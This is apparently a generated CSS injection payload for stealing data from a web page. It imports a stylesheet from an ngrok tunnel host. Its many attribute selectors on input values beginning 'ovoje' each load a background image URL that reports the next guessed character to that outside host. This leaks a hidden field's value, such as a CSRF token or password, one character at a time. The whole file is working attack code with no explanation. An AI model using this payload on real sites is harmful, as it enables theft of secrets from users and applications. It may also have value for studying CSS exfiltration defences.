@import url("http://bc0a37bcf1d5.ngrok.io/?l=7");
input[value="ovoje!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.16010014367587244");}
input[value="ovoje\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.9492194559656733");}
input[value="ovoje#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.22947890298594942");}
input[value="ovoje$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.9861585842820768");}
input[value="ovoje%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.3427544145336954");}
input[value="ovoje&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.214890525524015");}
input[value="ovoje'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.7182656631912248");}
input[value="ovoje("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.2606323655631053");}
input[value="ovoje)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.8018595288158736");}
input[value="ovoje*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.5270342784040645");}
input[value="ovoje+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.7157496223501614");}
input[value="ovoje,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.07093904989789435");}
input[value="ovoje-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.7593042529343579");}
input[value="ovoje."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.03747658198650061");}
input[value="ovoje/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.4585919318317411");}
input[value="ovoje0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.259173193909749");}
input[value="ovoje1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.8228762107798666");}
input[value="ovoje2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.42045709826837285");}
input[value="ovoje3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.6415416191096277");}
input[value="ovoje4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.19838595926473013");}
input[value="ovoje5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.12887234207341947");}
input[value="ovoje6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.9409618384575642");}
input[value="ovoje7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.6731598124504539");}
input[value="ovoje8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.4491598262933576");}
input[value="ovoje9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.3106504052754169");}
input[value="ovoje:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.8600397106858251");}
input[value="ovoje;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.668335570360644");}
input[value="ovoje<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.4810854412818004");}
input[value="ovoje="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.953026871180982");}
input[value="ovoje>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.6554457896716512");}
input[value="ovoje?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.43009999124463927");}
input[value="ovoje@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.11492889061450562");}
input[value="ovojeA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.4419575045195516");}
input[value="ovojeB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.9144323512562282");}
input[value="ovojeC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.5318430891980197");}
input[value="ovojeD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.2505038231828032");}
input[value="ovojeE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.20041340860610246");}
input[value="ovojeF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.3350270210059567");}
input[value="ovojeG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.787867912263857");}
input[value="ovojeH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.8586842365758103");}
input[value="ovojeI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.0994657316929346");}
input[value="ovojeJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.6226474766424941");}
input[value="ovojeK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.7546750942016627");}
input[value="ovojeL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.49986781335970365");}
input[value="ovojeM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.46546569785252245");}
input[value="ovojeN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.5559589238798655");}
input[value="ovojeO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.687900950156983");}
input[value="ovojeP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.41204629225684597");}
input[value="ovojeQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.9529993828542678");}
input[value="ovojeR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.9837905857021829");}
input[value="ovojeS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.8847328608608449");}
input[value="ovojeT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.17465990396127284");}
input[value="ovojeU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.6295792295149742");}
input[value="ovojeV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.694133077871673");}
input[value="ovojeW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.17151727244699466");}
input[value="ovojeX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.05225331459495841");}
input[value="ovojeY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.8054478362098281");}
input[value="ovojeZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.3153477375961895");}
input[value="ovoje["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.7519438571068684");}
input[value="ovoje\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.14919433684970018");}
input[value="ovoje]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.21322997582518655");}
input[value="ovoje^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.6981653690411396");}
input[value="ovoje_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.3988705689849772");}
input[value="ovoje`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.2968857432931413");}
input[value="ovojea"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.2724546642545824");}
input[value="ovojeb"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.036561913957210646");}
input[value="ovojec"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.5559338118197021");}
input[value="ovojed"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.08091968796260218");}
input[value="ovojee"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.9417405598995034");}
input[value="ovojef"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.6441197663065625");}
input[value="ovojeg"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.6976814266797626");}
input[value="ovojeh"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.32440279039070785");}
input[value="ovojei"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.020844267255024196");}
input[value="ovojej"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.3633769345525133");}
input[value="ovojek"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.7492089952216672");}
input[value="ovojel"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.63957682364121");}
input[value="ovojem"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.8900556576673075");}
input[value="ovojen"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.16668869016755128");}
input[value="ovojeo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.9474643387559065");}
input[value="ovojep"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.02988168365868593");}
input[value="ovojeq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.31161841516504474");}
input[value="ovojer"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.09363219745087026");}
input[value="ovojes"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.42154256926849887");}
input[value="ovojet"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.5948553422998706");}
input[value="ovojeu"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.7972596407103689");}
input[value="ovojev"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.6051472622035168");}
input[value="ovojew"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.43822233642280173");}
input[value="ovojex"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.8843060711547526");}
input[value="ovojey"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.22029718288379652");}
input[value="ovojez"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.9558690017544269");}
input[value="ovoje{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.2900543577390109");}
input[value="ovoje|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.3264895685886775");}
input[value="ovoje}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.2472997134967838");}
input[value="ovoje~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.6655914508657887");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3500101370703823");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8274539001515557");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3993734304914378");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6152751491253745");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5590746795492456");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9829801361028396");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9559494124676404");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.1766183333164364");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.27648500584330904");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5559416317349193");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7233994557667476");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7710082353653356");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.52945810164964");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5544151436782725");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.29528604235028233");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.23408204405166178");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4692582430350183");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8564346254471569");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.053155618942188676");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.16794027196738082");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3692078901267608");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.054279822115463894");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.13056402451097915");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8388359843170747");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6073891951784274");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.765257716525426");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.10888434085874188");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.288751372315984");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.748017265899434");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4859270431935421");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.14318985832179876");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4369187105524095");}
input[value="ovoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9816642033038996");}
input[value="ovoje "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.028353391673304973");}
input[value="ovoje¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.6992224953977617");}
input[value="ovoje¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.59769582336595");}
input[value="ovoje£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.6134694287458202");}
input[value="ovoje¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.5950527688660852");}
input[value="ovoje¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.8091993432282756");}
input[value="ovoje¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.48654201278785214");}
input[value="ovoje§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.1527969290146789");}
input[value="ovoje¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.8943014984867801");}
input[value="ovoje©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.9602437354410667");}
input[value="ovojeª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.1824961962513647");}
input[value="ovoje«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.09269772314506386");}
input[value="ovoje¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.964102266071577");}
input[value="ovoje­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.8626018650812146");}
input[value="ovoje®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.8854778952640721");}
input[value="ovoje¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.4037486135931032");}
input[value="ovoje°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.18303756529713322");}
input[value="ovoje±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.6108071963180346");}
input[value="ovoje²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.7481272707576312");}
input[value="ovoje³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.21260683843762251");}
input[value="ovoje´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.9461651458200655");}
input[value="ovojeµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.18325751498895815");}
input[value="ovoje¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.02514339673254229");}
input[value="ovoje·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.4927067330308825");}
input[value="ovoje¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.2252929500021783");}
input[value="ovoje¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.12599413635565737");}
input[value="ovojeº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.4752102445517232");}
input[value="ovoje»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.23675228882813193");}
input[value="ovoje¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.7615734338879958");}
input[value="ovoje½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.6761149607568004");}
input[value="ovoje¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.16304841830751426");}
input[value="ovoje¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.7936110750415275");}
input[value="ovojeÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.6514065275448411");}
input[value="ovojeÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.678427613626273");}
input[value="ovojeÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.5135803821575353");}
input[value="ovojeÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.43152462852370443");}
input[value="ovojeÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.8466579955904343");}
input[value="ovojeÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.1779646579719376");}
input[value="ovojeÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.7593130545191409");}
input[value="ovojeÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.3589867044862931");}
input[value="ovojeÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.6116673953688778");}
input[value="ovojeÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.5147859169934881");}
input[value="ovojeÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.921300651658971");}
input[value="ovojeË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.5608426693430337");}
input[value="ovojeÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.9430043382235291");}
input[value="ovojeÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.9635937603794564");}
input[value="ovojeÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.690490625968686");}
input[value="ovojeÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.7015817037354675");}
input[value="ovojeÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.883997152761318");}
input[value="ovojeÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.6570410130583548");}
input[value="ovojeÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.969373784427578");}
input[value="ovojeÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.32372808413528564");}
input[value="ovojeÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.646148062308354");}
input[value="ovojeÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.3114031529383148");}
input[value="ovojeÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.8842731898981371");}
input[value="ovoje×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.4804540649617044");}
input[value="ovojeØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.2881536981587758");}
input[value="ovojeÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.9120802840188038");}
input[value="ovojeÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.015062375509415693");}
input[value="ovojeÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.15942548846590254");}
input[value="ovojeÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.642909705608401");}
input[value="ovojeÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.8081155176931858");}
input[value="ovojeÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.29393546164289885");}
input[value="ovojeß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.0008709922333958175");}
input[value="ovojeà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.32140211819926834");}
input[value="ovojeá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.5651452829721844");}
input[value="ovojeâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.49142107098471155");}
input[value="ovojeã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.3930063873336287");}
input[value="ovojeä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.6416437919348494");}
input[value="ovojeå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.14425049523611988");}
input[value="ovojeæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.5324598495786816");}
input[value="ovojeç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.7648281590449895");}
input[value="ovojeè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.6634190861693194");}
input[value="ovojeé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.7166437902054312");}
input[value="ovojeê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.32312692791704545");}
input[value="ovojeë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.19823141016558754");}
input[value="ovojeì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.15803219738287044");}
input[value="ovojeí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.1697138801125766");}
input[value="ovojeî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.01865187630981846");}
input[value="ovojeï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.8586903803646257");}
input[value="ovojeð"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.3673349886955837");}
input[value="ovojeñ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.9390115227042604");}
input[value="ovojeò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.1320771642504741");}
input[value="ovojeó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.45255169291560216");}
input[value="ovojeô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.9966885571485613");}
input[value="ovojeõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.509360190201428");}
input[value="ovojeö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.6477436888263239");}
input[value="ovoje÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.5479363413727976");}
input[value="ovojeø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.1523680411334596");}
input[value="ovojeù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.29536954325261644");}
input[value="ovojeú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.6905725516796695");}
input[value="ovojeû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.1843588024938423");}
input[value="ovojeü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.43050550844715807");}
input[value="ovojeý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.5751539065257782");}
input[value="ovojeþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.38250681663518105");}
input[value="ovojeÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.8291876367907993");}
